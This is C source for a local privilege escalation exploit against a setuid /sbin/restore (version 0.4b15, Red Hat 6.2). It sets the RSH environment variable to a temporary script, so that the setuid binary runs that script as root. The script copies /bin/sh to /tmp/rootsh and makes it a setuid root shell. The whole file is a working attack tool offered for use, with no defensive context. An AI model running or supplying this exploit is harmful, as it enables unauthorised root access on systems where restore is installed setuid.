/* (linux)restore[0.4b15] local root exploit, by v9[v9@fakehalo.org].  this is
   the counterpart to Mat's /sbin/dump exploit findings.  it also can be applied
   on /sbin/restore i noticed.  /sbin/restore has to be setuid root for this to
   successfully exploit, of course. -- so here goes.

   note: this was built and tested for the redhat 6.2 installation.
*/
#define PATH            "/sbin/restore" // path to restore
#define TMPEXEC         "/tmp/tmpsh"    // the temporary file to execute.
#define SUIDSHELL       "/tmp/rootsh"   // where the rootshell will be located.
#include <stdio.h>
#include <sys/stat.h>
main(){
 char cmd[256],input[3];
 struct stat mod1,mod2;
 FILE *suidexec;
 fprintf(stderr,"[ (linux)restore[0.4b15] local root exploit, by v9[v9@fakehalo"
 ".org]. ]\n\n",PATH);
 if(stat(PATH,&mod1)){
  fprintf(stderr,"[!] failed, %s doesnt appear to exist.\n",PATH);
  exit(1);
 }
 else if(mod1.st_mode==36333){
  fprintf(stderr,"[*] %s appears to be setuid and setgid.\n",PATH);
 }
 else{
  fprintf(stderr,"[!] failed, %s doesn't appear to be setuid and setgid. (rh de"
  "fault)\n",PATH);
  exit(1);
 }
 fprintf(stderr,"[*] now making shell script to execute.\n");
 unlink(TMPEXEC);
 suidexec=fopen(TMPEXEC,"w");
 fprintf(suidexec,"#!/bin/sh\n");
 fprintf(suidexec,"cp /bin/sh %s\n",SUIDSHELL);
 fprintf(suidexec,"chown root.root %s\n",SUIDSHELL);
 fprintf(suidexec,"chmod 6755 %s\n",SUIDSHELL);
 fclose(suidexec);
 chmod(TMPEXEC,33261);
 fprintf(stderr,"[*] done, now setting up environmental variables.\n");
 setenv("INPUT",input,1);
 setenv("RSH",TMPEXEC,1);
 setenv("TAPE",":",1);
 fprintf(stderr,"[*] done, now building and executing the command line.\n");
 snprintf(input,sizeof(input),"y\nn");
 snprintf(cmd,sizeof(cmd),"echo $INPUT | %s -R 1>/dev/null 2>&1",PATH);
 system(cmd);
 sleep(1);
 unlink(TMPEXEC);
 fprintf(stderr,"[*] done, now checking for success.\n");
 if(stat(SUIDSHELL,&mod2)){
  fprintf(stderr,"[!] failed, %s doesn't exist.\n",SUIDSHELL);
  exit(1);
 }
 else if(mod2.st_mode==36333){
  fprintf(stderr,"[*] success, %s is now setuid and setgid.\n",SUIDSHELL);
 }
 else{
  fprintf(stderr,"[!] failed, %s exists, but doesnt appear to be setuid and set"
  "gid.\n",SUIDSHELL);
  exit(1);
 }
 fprintf(stderr,"[*] finished, everything appeared to have gone successful.\n");
 exit(0);
}